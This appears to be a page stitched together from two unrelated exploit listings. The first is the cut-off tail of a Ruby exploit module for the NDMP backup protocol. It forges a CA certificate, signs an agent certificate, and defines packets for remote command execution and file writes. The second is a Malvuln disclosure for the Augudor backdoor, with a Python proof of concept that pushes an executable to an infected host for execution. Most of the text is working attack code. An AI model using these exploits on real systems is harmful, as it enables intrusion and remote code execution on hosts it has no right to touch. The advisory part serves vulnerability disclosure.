SSL_HANDSHAKE_CONNECT: 4 }.freeze attr_reader :ca_cert, :ca_key def forge_ca @ca_key = OpenSSL::PKey::RSA.new(2048) @ca_cert = OpenSSL::X509::Certificate.new @ca_cert.version = 2 @ca_cert.serial = rand(2**32..2**64 - 1) @ca_cert.subject = @ca_cert.issuer = OpenSSL::X509::Name.parse("/CN=#{@hostname}") extn_factory = OpenSSL::X509::ExtensionFactory.new(@ca_cert, @ca_cert) @ca_cert.extensions = [ extn_factory.create_extension('subjectKeyIdentifier', 'hash'), extn_factory.create_extension('basicConstraints', 'CA:TRUE'), extn_factory.create_extension('keyUsage', 'keyCertSign, cRLSign') ] @ca_cert.add_extension(extn_factory.create_extension('authorityKeyIdentifier', 'keyid:always')) @ca_cert.public_key = @ca_key.public_key @ca_cert.not_before = Time.now - 7 * 60 * 60 * 24 @ca_cert.not_after = Time.now + 14 * 24 * 60 * 60 @ca_cert.sign(@ca_key, OpenSSL::Digest.new('SHA256')) end def sign_agent_csr(csr) o_csr = OpenSSL::X509::Request.new(csr) @be_agent_cert = OpenSSL::X509::Certificate.new @be_agent_cert.version = 2 @be_agent_cert.serial = rand(2**32..2**64 - 1) @be_agent_cert.not_before = Time.now - 7 * 60 * 60 * 24 @be_agent_cert.not_after = Time.now + 14 * 24 * 60 * 60 @be_agent_cert.issuer = @ca_cert.subject @be_agent_cert.subject = o_csr.subject @be_agent_cert.public_key = o_csr.public_key @be_agent_cert.sign(@ca_key, OpenSSL::Digest.new('SHA256')) end def default_sslpacket_content(ssl_packet_type) if ssl_packet_type == SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_SIGNED] ca_cert = @ca_cert.to_s agent_cert = @be_agent_cert.to_s else ca_cert = '' agent_cert = '' end { ssl_packet_type: ssl_packet_type, hostname: @hostname, nb_hostname: @hostname.upcase, ip_addr: @ip, cert_id1: get_cert_id(@ca_cert), cert_id2: get_cert_id(@ca_cert), unknown1: 0, unknown2: 0, ca_cert_len: ca_cert.length, ca_cert: ca_cert, agent_cert_len: agent_cert.length, agent_cert: agent_cert } end def get_cert_id(cert) Digest::SHA1.digest(cert.issuer.to_s + cert.serial.to_s(2))[0...4].unpack1('L<') end end NDMP_CONFIG_GET_AUTH_ATTR = 0x103 NDMP_SSL_HANDSHAKE = 0xf383 NDMP_EXECUTE_COMMAND = 0xf30f NDMP_FILE_OPEN_EXT = 0xf308 NDMP_FILE_WRITE = 0xF309 NDMP_FILE_CLOSE = 0xF306 AUTH_TYPES = { 1 => 'Text', 2 => 'MD5', 3 => 'BEWS', 4 => 'SSPI', 5 => 'SHA', 190 => 'BEWS2' # 0xBE }.freeze # Responce packets class NdmpNotifyConnectedRes < XDR::Struct attribute :connected, XDR::Int attribute :version, XDR::Int attribute :reason, XDR::Int end class NdmpConnectOpenRes < XDR::Struct attribute :err_code, XDR::Int end class NdmpConfigGetServerInfoRes < XDR::Struct attribute :err_code, XDR::Int attribute :vendor_name, XDR::String[] attribute :product_name, XDR::String[] attribute :revision, XDR::String[] attribute :auth_types, XDR::VarArray[XDR::Int] end class NdmpConfigGetHostInfoRes < XDR::Struct attribute :err_code, XDR::Int attribute :hostname, XDR::String[] attribute :os, XDR::String[] attribute :os_info, XDR::String[] attribute :ip, XDR::String[] end class NdmpSslHandshakeRes < XDR::Struct attribute :data_len, XDR::Int attribute :data, XDR::String[] attribute :err_code, XDR::Int attribute :unknown4, XDR::String[] end class NdmpConfigGetAuthAttrRes < XDR::Struct attribute :err_code, XDR::Int attribute :auth_type, XDR::Int attribute :challenge, XDR::Opaque[64] end class NdmpConnectClientAuthRes < XDR::Struct attribute :err_code, XDR::Int end class NdmpExecuteCommandRes < XDR::Struct attribute :err_code, XDR::Int end class NdmpFileOpenExtRes < XDR::Struct attribute :err_code, XDR::Int attribute :handler, XDR::Int end class NdmpFileWriteRes < XDR::Struct attribute :err_code, XDR::Int attribute :recv_len, XDR::Int attribute :unknown, XDR::Int end class NdmpFileCloseRes < XDR::Struct attribute :err_code, XDR::Int end # Request packets class NdmpConnectOpenReq < XDR::Struct attribute :version, XDR::Int end class NdmpSslHandshakeReq < XDR::Struct attribute :ssl_packet_type, XDR::Int attribute :nb_hostname, XDR::String[] attribute :hostname, XDR::String[] attribute :ip_addr, XDR::String[] attribute :cert_id1, XDR::Int attribute :cert_id2, XDR::Int attribute :unknown1, XDR::Int attribute :unknown2, XDR::Int attribute :ca_cert_len, XDR::Int attribute :ca_cert, XDR::String[] attribute :agent_cert_len, XDR::Int attribute :agent_cert, XDR::String[] end class NdmpConfigGetAuthAttrReq < XDR::Struct attribute :auth_type, XDR::Int end class NdmpConnectClientAuthReq < XDR::Struct attribute :auth_type, XDR::Int attribute :username, XDR::String[] attribute :hash, XDR::Opaque[32] end class NdmpExecuteCommandReq < XDR::Struct attribute :cmd, XDR::String[] attribute :unknown, XDR::Int end class NdmpFileOpenExtReq < XDR::Struct attribute :filename, XDR::String[] attribute :dir, XDR::String[] attribute :mode, XDR::Int end class NdmpFileWriteReq < XDR::Struct attribute :handler, XDR::Int attribute :len, XDR::Int attribute :data, XDR::String[] end class NdmpFileCloseReq < XDR::Struct attribute :handler, XDR::Int end end </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/94ccd337cbdd4efbbcc0a6c888abb87d.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Augudor.b Vulnerability: Remote File Write Code Execution Description: The malware drops an empty file named "zy.exe" and listens on TCP port 810. Third-party adversaries who can reach the infected host can write executable code to the empty "zy.exe" file on the system via a socket program and it will execute as soon as the binary transfer has completed. Successfully tested with a 880 byte executable. Family: Augudor Type: PE32 MD5: 94ccd337cbdd4efbbcc0a6c888abb87d Vuln ID: MVID-2022-0644 Dropped files: zy.exe Disclosure: 09/25/2022 Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=810 DOOM="DOOM_SM.exe" #880 bytes def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) f = open(DOOM, "rb") EXE = f.read() s.send(EXE) while EXE: s.send(EXE) EXE=f.read() s.close() print("By Malvuln"); if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>